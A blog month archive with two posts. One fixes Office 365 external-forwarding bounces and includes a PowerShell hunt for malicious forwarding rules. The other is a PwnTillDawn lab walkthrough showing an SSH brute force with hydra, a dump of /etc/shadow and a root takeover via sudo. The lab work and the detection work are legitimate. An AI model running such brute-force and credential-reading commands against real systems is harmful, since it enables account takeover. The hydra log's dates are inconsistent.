Month: January 2021
I used to have an auto-forward set up on my mail account in Office 365. However, for a few weeks I have been getting the following errors:
Your message wasn’t delivered because the recipient’s email provider rejected it.
and
Remote Server returned ‘550 5.7.520 Access denied, Your organization does not allow external forwarding. Please contact your administrator for further assistance. AS(7555)’
The result of these error messages was that my emails were no longer automatically forwarded to the other mailbox.
Before September 2020, Office 365 allowed emails to be automatically forwarded to external email addresses. This is called "External forwarding". Since September 2020, Microsoft has changed the default of the outbound spam filter policy so that external forwarding is disabled at the organization level unless an administrator explicitly turns it on. This means that all mail that was previously neatly forwarded to an external email address is now suddenly blocked. The affected mailbox, the one with the forwarding rule set up, receives the bounce "Your message wasn't delivered because the recipient's email provider rejected it." with the 550 5.7.520 status above.
How to fix Remote Server returned ‘550 5.7.520 Access denied
An Office 365 administrator can adjust the default setting in the Office 365 environment, making it possible to forward mail externally again. If you are a regular user of Office 365, ask your IT admin to adjust the setting and send him or her the URL of this web page.
If you are an administrator, follow these steps to re-enable External Forwarding:
- Go to the Office 365 Security & Compliance Center
- Expand Threat management and click Policy
- Click Anti-spam
- In the Anti-spam settings, locate Outbound spam filter policy (Always ON) and click Edit policy
- In the Outbound spam filter policy, expand Automatic forwarding. The default is Automatic – System-controlled, which since September 2020 behaves as Off.
- Select On – Forwarding is enabled and click Save. Forwarding to external mail addresses is now allowed. Note that Microsoft says it may take up to 24 hours before the change takes effect, although it took 5 minutes in my case 🙂
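The same change can be scripted from Exchange Online PowerShell, which is also the quickest way to verify what the tenant is currently set to. The following is an added example and not part of the original post; it assumes the ExchangeOnlineManagement module is installed, that the account used holds an Exchange admin role, and it uses contoso.com and jane@contoso.com as placeholder names.

```powershell
# Added example (not from the original post): fixing 550 5.7.520 via Exchange Online PowerShell.
# Assumes the ExchangeOnlineManagement module and an Exchange admin role; contoso.com is a placeholder.
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -UserPrincipalName admin@contoso.com

# 1. Inspect the outbound spam filter policies. "Automatic" is the system-controlled default,
#    which since September 2020 behaves as Off and produces the 550 5.7.520 bounce.
Get-HostedOutboundSpamFilterPolicy | Select-Object Name, AutoForwardingMode, IsDefault

# 2a. Equivalent of the portal steps above: allow external forwarding for the whole tenant.
Set-HostedOutboundSpamFilterPolicy -Identity Default -AutoForwardingMode On

# 2b. Narrower alternative, preferable in most organizations: keep the default policy at Off
#     and allow forwarding only for the senders that need it, through a custom policy plus a
#     rule scoped to those mailboxes (jane@contoso.com is a placeholder).
Set-HostedOutboundSpamFilterPolicy -Identity Default -AutoForwardingMode Off
New-HostedOutboundSpamFilterPolicy -Name "Allow external forwarding" -AutoForwardingMode On
New-HostedOutboundSpamFilterRule -Name "Allow external forwarding" `
    -HostedOutboundSpamFilterPolicy "Allow external forwarding" `
    -From "jane@contoso.com"

# 3. Confirm the end state before disconnecting.
Get-HostedOutboundSpamFilterPolicy | Select-Object Name, AutoForwardingMode, IsDefault
Get-HostedOutboundSpamFilterRule  | Select-Object Name, HostedOutboundSpamFilterPolicy, From, State

Disconnect-ExchangeOnline -Confirm:$false
```

Step 2a reproduces the portal fix; step 2b is the alternative a security team will usually prefer, because the tenant-wide default stays Off while the few mailboxes with a legitimate need are whitelisted by sender. Run one or the other, not both.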
A setting to rethink – Automatic forwarding to external email addresses
You may wonder whether it is a good idea to change the default setting for automatic forwarding to external addresses.
One reason not to allow it is data loss prevention: an automatic forward is an exfiltration channel that needs no further access to the mailbox. Recently I was with a customer whose password had been leaked. Attackers had gained access to his mailbox. Instead of reading it directly, they quietly created an inbox rule that automatically forwarded all of his mail to an external email address, and nobody noticed. A good example of corporate espionage.
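Before re-enabling external forwarding, it is worth checking whether rules like the one in that story already exist in the tenant. The script below is an added example, not part of the original post; it assumes an existing Connect-ExchangeOnline session with a role that can read mailboxes and inbox rules, and victim@contoso.com in the last comment is a placeholder.

```powershell
# Added example (not from the original post): hunt for silent forwarding, both at mailbox level
# and as inbox rules. Assumes an existing Connect-ExchangeOnline session with an Exchange admin role.

# Return the e-mail addresses in a set of rule targets that are outside the tenant's own domains.
function Get-ExternalTargets {
    param([string[]]$Targets, [string[]]$InternalDomains)
    foreach ($t in $Targets) {
        # Rule targets look like '"Name" [SMTP:user@example.net]'; pull out the bare addresses.
        foreach ($m in [regex]::Matches($t, '[\w.+-]+@[\w-]+(\.[\w-]+)+')) {
            if (($m.Value -split '@')[-1] -notin $InternalDomains) { $m.Value }
        }
    }
}

$internal  = (Get-AcceptedDomain).DomainName
$mailboxes = Get-Mailbox -ResultSize Unlimited

# 1. Forwarding configured on the mailbox object itself (needs admin or the user's own settings).
$mailboxForwards = $mailboxes |
    Where-Object { $_.ForwardingSmtpAddress -or $_.ForwardingAddress } |
    Select-Object UserPrincipalName, ForwardingSmtpAddress, ForwardingAddress, DeliverToMailboxAndForward

# 2. Inbox rules that forward or redirect. An attacker holding only the user's password can
#    create these from Outlook on the web without touching any admin setting.
$ruleForwards = foreach ($mbx in $mailboxes) {
    Get-InboxRule -Mailbox $mbx.UserPrincipalName |
        Where-Object { $_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo } |
        ForEach-Object {
            $targets = @($_.ForwardTo) + @($_.ForwardAsAttachmentTo) + @($_.RedirectTo)
            $hits    = Get-ExternalTargets -Targets $targets -InternalDomains $internal
            if ($hits) {
                [pscustomobject]@{
                    Mailbox         = $mbx.UserPrincipalName
                    RuleName        = $_.Name
                    Enabled         = $_.Enabled
                    ExternalTargets = ($hits -join ', ')
                }
            }
        }
}

"Mailbox-level forwarding:";      $mailboxForwards | Format-Table -AutoSize
"Inbox rules forwarding externally:"; $ruleForwards | Format-Table -AutoSize

# 3. Once a rule is confirmed malicious, disable it and reset the account (placeholders):
#    Disable-InboxRule -Mailbox victim@contoso.com -Identity "<rule name>"
```

Get-InboxRule is called once per mailbox, so this takes a while in a large tenant; schedule it rather than running it interactively. Note also that with the default policy left at Off, a malicious rule does not leak anything, it only generates the 550 5.7.520 bounces described at the top of this post, which makes those bounces a useful signal of a compromised account rather than just an annoyance.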
ptd-stuntmanmike-private
https://online.pwntilldawn.com/Achievements/Details/1/1438
As always, we start with an nmap scan.
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -A 10.150.150.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:59 GMT
Nmap scan report for 10.150.150.166
Host is up (0.032s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey:
|   2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
|   256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_  256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after:  2022-10-24T09:15:13
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
Just connecting to SSH is enough for the first flag: the pre-authentication banner leaks it, and tells us the user is called mike.
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #ssh root@10.150.150.166
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
root@10.150.150.166's password:
With a username in hand, we brute-force mike's SSH password with hydra and rockyou.
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-26 11:29:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166 login: mike password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-26 11:29:51
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
Logged in as mike, the second flag sits in his home directory. sudo -l shows he may run anything as root (he is also in the lxd group), so the last flag is one sudo away: reset the root password and switch user.
mike@stuntmanmike:~$ cat FLAG36
8cff2cce1a88a54db986d968a4b7a66fb3588c20
mike@stuntmanmike:~$ sudo -l
Matching Defaults entries for mike on stuntmanmike:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on stuntmanmike:
    (ALL : ALL) ALL
mike@stuntmanmike:~$ groups
mike adm cdrom sudo dip plugdev lxd
mike@stuntmanmike:~$ sudo cat /etc/shadow
root:*:17941:0:99999:7:::
--snip--
sshd:*:18043:0:99999:7:::
mike:$6$4ytsdVARn//SY.7x$ZNJHsx3CHR3zCU91Q.3RjHDK4hZ72GIT5.n/ygetAZ3Armybjj.l6QMb5PAvidEHvgGRipOcycOTnU8ePzwEl1:18043:0:99999:7:::
splunk:!:18194:0:99999:7:::
mike@stuntmanmike:/$ sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
mike@stuntmanmike:/$ su root
Password:
root@stuntmanmike:/# cd /root
root@stuntmanmike:~# cat FLAG37
28d10397e475a50fc0d6c73f7c23355ebdf15a3f
However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.